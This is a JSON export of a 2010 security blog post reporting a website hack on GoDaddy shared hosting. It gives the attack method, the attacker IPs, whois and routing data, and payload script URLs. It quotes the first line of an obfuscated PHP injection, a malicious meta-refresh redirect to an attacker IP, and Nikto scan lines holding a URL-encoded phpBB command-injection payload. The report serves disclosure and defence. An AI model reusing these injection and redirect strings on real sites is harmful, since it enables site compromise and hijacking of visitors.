{"id":2057,"date":"2010-11-02T23:08:15","date_gmt":"2010-11-03T06:08:15","guid":{"rendered":"http:\/\/www.ait-pro.com\/aitpro-blog\/?p=2057"},"modified":"2011-04-04T11:18:55","modified_gmt":"2011-04-04T18:18:55","slug":"website-hack-report-case-study-for-recent-website-hacks-during-september-october-and-november","status":"publish","type":"post","link":"https:\/\/www.ait-pro.com\/aitpro-blog\/2057\/misc-projects\/security-reports-warnings-and-fixes\/website-hack-report-case-study-for-recent-website-hacks-during-september-october-and-november\/","title":{"rendered":"Website Hack Report &#8211; Case Study For Recent Website Hacks During September, October and November"},"content":{"rendered":"<h2>Hack Attack details For Recent GoDaddy Website Hack<br \/>\nHack Date: October 31, 2010 11:30pm PST<\/h2>\n<table style=\"width: 575px;\" border=\"0\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td>\u00a0<strong>* In no way, shape or form is this report intended to reflect negatively on GoDaddy web hosting.\u00a0 AIT-pro.com is hosted on GoDaddy and will continue to use GoDaddy web hosting.\u00a0 We could not be any more pleased than we already are with GoDaddy web hosting services and support.<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td width=\"575\"><strong>Attack Method<\/strong> &#8211; Initial SQL Injection \u2013 For the primary purpose of redirection to specified encoded IP. Upon site visit &#8211; download and cache of additional payload files used for successful execution of additional IP redirection. True goal \/ intention appears to be masked with several layers of subterfuge tactics to give the appearance of a classic malware infection. Desired end result possible traffic boost. Not conclusive. True intentions could have just been simply to disrupt GoDaddy web hosting services.<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Base64 Code Injection String (only including\u00a0first line of base64 code injection for search purposes)<\/strong><\/td>\n<\/tr>\n<tr>\n<td><code>$_8b7b=\"\\x63\\x72\\x65\\x61\\x74\\x65\\x5f\\x66\\x75\\x6e\\x63\\x74\\x69\\x6f\\x6e\";$_8b7b1f=<\/code><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>ChLoE &#8211; Level 9<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>CClearHost<\/strong> &#8211; Non-Conclusive<\/td>\n<\/tr>\n<tr>\n<td><strong>Design &amp; Intention<\/strong> &#8211; Non-destructive &#8211; Primary Desired Result Redirection to intended IP or disruption of services. The ultimate beneficiary is not 100% absolutely clear.<\/td>\n<\/tr>\n<tr>\n<td><strong>Possible Motive \/ Goal<\/strong> &#8211; Visitor Traffic Rank Increase by Redirection<\/td>\n<\/tr>\n<tr>\n<td><strong>Indirect Beneficiary<\/strong> &#8211; Host globalnet.ba\u00a0<strong>*I am not implying that globalnet.ba is responsible for this attack to increase ranking.<\/strong> It is clear that they do benefit indirectly from this attack, but there is no direct link to insomniaboldinfoorg.com &amp; globalnet.ba except for the fact that insomniaboldinfoorg.com and other domains launching this attack are hosted on globalnet.ba web hosting. This web host could be a victim in these attacks as well.<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Attack Dates | IP Addresses Involved<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Sept 17<\/strong> | 77.78.239.53 (most likely other IPs in this subnet as well)<\/td>\n<\/tr>\n<tr>\n<td><strong>Later Sept \u2013Early Oct <\/strong>| 77.78.239.53 (most likely other IPs in this subnet as well) \u2013 total of 7 different domains with same IP<\/td>\n<\/tr>\n<tr>\n<td><strong>Oct 19 \u2013 21 | <\/strong>77.78.239.53 (most likely other IPs in this subnet as well) \u2013 total of 3 different domains with same IP<\/td>\n<\/tr>\n<tr>\n<td><strong>Oct 31 11:30pm PST<\/strong> | 77.78.239.53, 77.78.247.28, 77.78.201.251<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><a href=\"http:\/\/www.ait-pro.com\/aitpro-blog\/wp-content\/uploads\/2010\/11\/alexa-graph.png\" rel=\"lightbox[2057]\"><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-2060\" title=\"Alexa Graph\" src=\"http:\/\/www.ait-pro.com\/aitpro-blog\/wp-content\/uploads\/2010\/11\/alexa-graph.png\" alt=\"Alexa Graph\" width=\"400\" height=\"220\" srcset=\"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-content\/uploads\/2010\/11\/alexa-graph.png 400w, https:\/\/www.ait-pro.com\/aitpro-blog\/wp-content\/uploads\/2010\/11\/alexa-graph-300x165.png 300w\" sizes=\"auto, (max-width: 400px) 100vw, 400px\" \/><\/a><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Although the attack dates do not match up exactly with the resulting ranking increases displayed in the Alexa graph above there is a definite similarity in the pattern and of course all of these attacks originate from the same IP block and subnet. Other factors include how accurately the Alexa graph displays results by date. Ie realtime vs post DB update. How accurately attack dates are reported. Ie I see several conflicting dates of attack. I am only 100% positive of all data collected for Oct 31 because I personally tracked the attack from T +20 minutes to T + 24 hours. Once again this web host could also be a victim in these attacks.<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Netrange 77.0.0.0 \u2013 77.255.255.255<\/td>\n<\/tr>\n<tr>\n<td>Domain insomniaboldinfoorg.com<\/td>\n<\/tr>\n<tr>\n<td>Sarajevo Bosnia and Herzegovina<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Known IP Addresses involved<\/strong><\/td>\n<\/tr>\n<tr>\n<td>IP 77.78.239.53<\/td>\n<\/tr>\n<tr>\n<td>IP 77.78.247.28<\/td>\n<\/tr>\n<tr>\n<td>IP 77.78.201.251<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>ISP<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Bosnia And Herzegovina Sarajevo Globalnet Bh<\/td>\n<\/tr>\n<tr>\n<td>inetnum: 77.78.241.0 &#8211; 77.78.247.255<\/td>\n<\/tr>\n<tr>\n<td>netname: GLOBALNET-ISP<\/td>\n<\/tr>\n<tr>\n<td>descr: GlobalNET BH<\/td>\n<\/tr>\n<tr>\n<td>descr: Internet Service Provider<\/td>\n<\/tr>\n<tr>\n<td>descr: http:\/\/www.globalnet.ba\/<\/td>\n<\/tr>\n<tr>\n<td>address: Bosnia and Herzegovina<\/td>\n<\/tr>\n<tr>\n<td>nic-hdl: JB1004<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Additional Payload Files involved<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>Javasript Files Involved (detectable)<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>Function: Encoder \/ Decoder<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Javascript file yirvqjkm.js origin = IP 77.78.247.28<\/td>\n<\/tr>\n<tr>\n<td>Full domain path to js script file &gt;&gt;&gt; http:\/\/77.78.247.28\/js\/1\/yirvqjkm.js<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Javascript file functions.js origin = IP 77.78.247.28<\/td>\n<\/tr>\n<tr>\n<td>Full domain path to js script file &gt;&gt;&gt; http:\/\/77.78.247.28\/js\/functions.js<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>HTML Files Involved (detectable)<\/strong><\/td>\n<\/tr>\n<tr>\n<td><strong>Source of HTML file<\/strong><\/td>\n<\/tr>\n<tr>\n<td><code>http:\/\/77.78.201.251\/index.php?H20=qW&amp;09G=C99VM9AHQ5&amp;Lm9=<br \/>\nXM20oJUs2K15U&amp;3KO=0T5A1EFFMOAQS86&amp;tsov=<br \/>\nZwSmlMBktyAgoKf3wAZmMGPj1GMw%3D%3D&amp;62Z=<br \/>\n31454OXHOJA6X077C&amp;KaucT=TBJMlAaLyIxPx44N0RGXG1YLSR&amp;3T=<br \/>\n321IX6T2AA7BB&amp;bos=SEkHM2o0fz&amp;9zKS=022HN2RV6JX5GS2Y%2FKUUgLjd<\/code><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Redirect code within above HTML file<\/strong><\/td>\n<\/tr>\n<tr>\n<td><code>&lt;meta http-equiv=\"refresh\" content=\"0; url=http:\/\/77.78.247.28\/index.php?e55E=<br \/>\ngEvW&amp;7i8P4=5275WR6EX&amp;nZ56= iZgcVtzKFdTUgctLQgHCQwAZQAMCWlAKj08&amp;8iBAL=<br \/>\nB8DJ10&amp;d69=AA95AwYIJAUzfzR%2BKwEFCFQII&amp;7IS= 127808F8J95PJEE&amp;Yh=<br \/>\nMy5dICE%2BTC0nV&amp;R068=36KQ95147W241X4ONHOWW0dEQ&amp;V2W=<br \/>\nGcvXDZJWg8jITlUVWhc&amp;au=ExPAX5%2FDQUf&amp;ff=1A0KXdzDAcBBzNnB\" \/&gt;<\/code><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>PHP Files Involved \u2013 several (not retrievable)<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Remote PHP script execution appear not to be intended to be cached<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>DNS Lookup For 77.78.247.28<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Spoof &#8211; 28.247.78.77.in-addr.arpa. IN PTR<\/td>\n<\/tr>\n<tr>\n<td>Spoofed to United States Columbus Dod Network Information Center<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>globalnet.ba Information<\/strong><\/td>\n<\/tr>\n<tr>\n<td>nameserver: ns1.globalnet.ba<\/td>\n<\/tr>\n<tr>\n<td>nameserver: ns2.globalnet.ba<\/td>\n<\/tr>\n<tr>\n<td>nameserver: rns.globalnet.ba<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>Nodes to Final Destination<\/strong><\/td>\n<\/tr>\n<tr>\n<td>188.64.105.30 &#8211; Ljubljana Slovenia<\/td>\n<\/tr>\n<tr>\n<td>77.77.197.34 &#8211; globalnet.telemach.ba<\/td>\n<\/tr>\n<tr>\n<td>77.78.192.5 \u2013 Unknown<\/td>\n<\/tr>\n<tr>\n<td>77.78.192.15 \u2013 globalnet.ba<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>\n<table style=\"width: 570px; height: 38px;\" border=\"1\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><strong>blacklist_zone<\/strong><\/td>\n<td><strong>domain<\/strong><\/td>\n<td><strong>status<\/strong><\/td>\n<td><strong>Submitted<\/strong><\/td>\n<td><strong>Added<\/strong><\/td>\n<td><strong>Rejected<\/strong><\/td>\n<td><strong>Removed<\/strong><\/td>\n<\/tr>\n<tr>\n<td>whois<\/td>\n<td>ba<\/td>\n<td>Listed<\/td>\n<td>Apr 16, 2004 9:26 EDT<\/td>\n<td>Apr 16, 2004 11:07 EDT<\/td>\n<td>Never<\/td>\n<td>Never<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong>General Info and reputation of web host<\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Globalnet.ba is a domain controlled by three name servers at globalnet.ba themselves. Two of them are on the same IP network. The primary name server is ns1.globalnet.ba. Incoming mail for globalnet.ba is handled by five mail servers at googlemail.com and google.com. Two mail servers have the same IP number. All four of them are on different IP networks. globalnet.ba has one IP number (77.78.192.15) , which also has a corresponding reverse pointer.<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Www.globalnet.ba cnames to this hostname. Crtaci.gnet.ba, int.gnet.ba, www.crtaci.gnet.ba, vpsmachine.int.gnet.ba and root.vpsmachine.int.gnet.ba point to the same IP. Teamwaffle.net use this as a name server under another name. Rental.ba, hackforums.net, casper.ba, nkcelik.info, bihnet.org and at least 31 other hosts share name servers with this domain. Telemach.ba, irc.bolchat.org, 249.77.77.in-addr.arpa, 251.77.77.in-addr.arpa, 250.77.77.in-addr.arpa and at least two other hosts share name servers under another name with this domain. Ifesgulf.com, joshua.net, fedro.com, quivive.nl, gregbiggers.com and at least 200 other hosts share mail servers with this domain. Heartthegamer.com, contea.net, slimverdienen.com, hillsc.net, butysportowe.net and at least 16 other hosts share mail servers under another name with this domain. Pptp-200-sa.globalnet.ba, analyzer-eth1.globalnet.ba, secure.globalnet.ba, ns4.globalnet.ba, ns3.globalnet.ba and at least 31 other hosts are subdomains to this hostname.<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>\n<table border=\"1\" cellspacing=\"0\" cellpadding=\"0\">\n<tbody>\n<tr>\n<td><strong>in bgp<\/strong><\/td>\n<td><strong>route record<\/strong><\/td>\n<td><strong>prefix<\/strong><\/td>\n<td><strong>description<\/strong><\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">AS42560<br \/>\nAS42983<\/td>\n<td valign=\"top\">77.77.192.0\/18<\/td>\n<td valign=\"top\">main route block main route block<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.77.194.0\/23<\/td>\n<td valign=\"top\">TELEMACH<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.77.196.0\/22<\/td>\n<td valign=\"top\">TELEMACH<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.77.224.0\/19<\/td>\n<td valign=\"top\">TELEMACH<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">\u00a0<\/td>\n<td valign=\"top\">\u00a0<\/td>\n<td valign=\"top\">77.78.192.0\/18<\/td>\n<td valign=\"top\">GlobalNET Bosnia<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.192.0\/24<\/td>\n<td valign=\"top\">GlobalNET Bosnia<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.193.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.194.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.195.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.196.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.197.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.198.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.199.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.200.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.201.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.202.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.203.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.204.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.205.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.206.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">(unannounced)<\/td>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">77.78.207.0\/24<\/td>\n<td valign=\"top\">GlobalNET subnet<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">MISSING!<\/td>\n<td valign=\"top\">77.78.239.0\/24<\/td>\n<td valign=\"top\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">MISSING!<\/td>\n<td valign=\"top\">77.78.240.0\/24<\/td>\n<td valign=\"top\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">MISSING!<\/td>\n<td valign=\"top\">77.78.248.0\/24<\/td>\n<td valign=\"top\">\u00a0<\/td>\n<\/tr>\n<tr>\n<td valign=\"top\">AS42560<\/td>\n<td valign=\"top\">MISSING!<\/td>\n<td valign=\"top\">77.78.249.0\/24<\/td>\n<td valign=\"top\">\u00a0<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong><span style=\"color: #ff0000;\">Nikto Scan Results on Shared Host Server that was attacked<\/span><\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td>Can&#8217;t locate auto\/Net\/SSLeay\/autosplit.ix in @INC (@INC contains: C:\/Perl\/site\/lib C:\/Perl\/lib .) at C:\/Perl\/lib\/AutoLoader.pm line 173.<br \/>\n\u00a0at C:\/Perl\/lib\/Net\/SSLeay.pm line 61<br \/>\n&#8211; Nikto v2.1.3<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\n+ Target IP:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 173.201.92.1<br \/>\n+ Target Hostname:\u00a0\u00a0\u00a0 p3nlhg43c081.shr.prod.phx3.secureserver.net<br \/>\n+ Target Port:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 80<br \/>\n+ Start Time:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2010-11-07 15:55:45<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\n+ Server: Apache<br \/>\nE:Sat Nov\u00a0 6 15:55:56 2010 + ERROR: \/cgi.cgi\/ returned an error: error reading HTTP response<br \/>\n+ No CGI Directories found (use &#8216;-C all&#8217; to force check all possible dirs)<br \/>\n+ ETag header found on server, inode: 14271895, size: 91, mtime: 0x477838c1c0907<br \/>\nE:Sat Nov\u00a0 6 15:56:10 2010 + ERROR: \/index.php3 returned an error: error reading HTTP response<br \/>\n+ Multiple index files found (note, these may not all be unique): default.asp, index.jhtml, index.php, index.htm, index.pl, default.htm, index.as<br \/>\npx, default.aspx, index.asp, index.do, index.cfm, index.cgi, index.html, index.shtml,<br \/>\n+ DEBUG HTTP verb may show server debugging information. See http:\/\/msdn.microsoft.com\/en-us\/library\/e8z01xdh%28VS.80%29.aspx for details.<br \/>\nE:Sat Nov\u00a0 6 15:56:21 2010 + ERROR: \/ returned an error: error reading HTTP response<br \/>\nE:Sat Nov\u00a0 6 15:56:31 2010 + ERROR: \/ returned an error: error reading HTTP response<br \/>\nE:Sat Nov\u00a0 6 15:56:54 2010 + ERROR: \/postnuke\/viewtopic.php?t=2&amp;rush=%6c%73%20%2d%61%6c&amp;highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%5<br \/>\n0%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response<br \/>\nE:Sat Nov\u00a0 6 15:57:13 2010 + ERROR: \/phpBB\/viewtopic.php?t=2&amp;rush=%6c%73%20%2d%61%6c&amp;highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5<br \/>\nf%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527 returned an error: error reading HTTP response<br \/>\n+ 58 items checked: 6 error(s) and 3 item(s) reported on remote host<br \/>\n+ End Time:\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0 2010-11-07 15:57:23 (98 seconds)<br \/>\n&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;<br \/>\n+ 1 host(s) tested<\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><strong><span style=\"color: #ff0000;\">GoDaddy was notified first of our findings before this information was posted.\u00a0 Post was released on confirmation from GoDaddy that this issue was resolved: \u00a0malicious code \/ worm scan result for postnuke and phpBB.<\/span><\/strong><\/td>\n<\/tr>\n<tr>\n<td>\u00a0<\/td>\n<\/tr>\n<tr>\n<td><span class=\"bluelink\"><a title=\"Nikto Web Server Scanner\" rel=\"nofollow\" href=\"http:\/\/cirt.net\/nikto2\" target=\"_blank\">More about Nikto2 Open Source web server scanner&#8230;<\/a><\/span><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n","protected":false},"excerpt":{"rendered":"<p>Hack Attack details For Recent GoDaddy Website Hack Hack Date: October 31, 2010 11:30pm PST \u00a0* In no way, shape or form is this report intended to reflect negatively on GoDaddy web hosting.\u00a0 AIT-pro.com is hosted on GoDaddy and will continue to use GoDaddy web hosting.\u00a0 We could not be any more pleased than we [&hellip;]<\/p>\n","protected":false},"author":167,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":"","_links_to":"","_links_to_target":""},"categories":[311],"tags":[308,309,307],"class_list":["post-2057","post","type-post","status-publish","format-standard","hentry","category-security-reports-warnings-and-fixes","tag-website-hack-november","tag-website-hack-october","tag-website-hack-september"],"aioseo_notices":[],"_links":{"self":[{"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/posts\/2057","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/users\/167"}],"replies":[{"embeddable":true,"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/comments?post=2057"}],"version-history":[{"count":0,"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/posts\/2057\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/media?parent=2057"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/categories?post=2057"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.ait-pro.com\/aitpro-blog\/wp-json\/wp\/v2\/tags?post=2057"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}